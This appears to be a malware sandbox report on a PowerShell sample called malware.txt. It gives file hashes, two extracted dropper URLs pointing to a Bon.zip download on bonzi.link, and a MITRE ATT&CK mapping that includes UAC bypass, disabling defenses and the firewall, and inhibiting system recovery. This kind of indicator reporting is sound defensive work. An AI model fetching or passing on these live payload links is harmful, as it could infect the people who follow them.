General

  • Target

    malware.txt

  • Size

    7KB

  • Sample

    240519-vqevxsgh94

  • MD5

    6e0473af4fbc9223bb02c4cbbad2ae4e

  • SHA1

    e710bf9f0dc329d34644f869d580eb378bf179ec

  • SHA256

    c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f

  • SHA512

    e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444

  • SSDEEP

    96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bonzi.link/Bon.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bonzi.link/Bon.zip

Targets

    • Target

      malware.txt

    • Size

      7KB

    • MD5

      6e0473af4fbc9223bb02c4cbbad2ae4e

    • SHA1

      e710bf9f0dc329d34644f869d580eb378bf179ec

    • SHA256

      c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f

    • SHA512

      e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444

    • SSDEEP

      96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z

MITRE ATT&CK Matrix ATT&CK v13

Execution

System Services

1
T1569

Service Execution

1
T1569.002

Command and Scripting Interpreter

2
T1059

PowerShell

1
T1059.001

Persistence

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

2
T1562

Disable or Modify Tools

1
T1562.001

Disable or Modify System Firewall

1
T1562.004

Modify Registry

1
T1112

File and Directory Permissions Modification

1
T1222

Discovery

System Information Discovery

3
T1082

Query Registry

1
T1012

Impact

Inhibit System Recovery

1
T1490

Tasks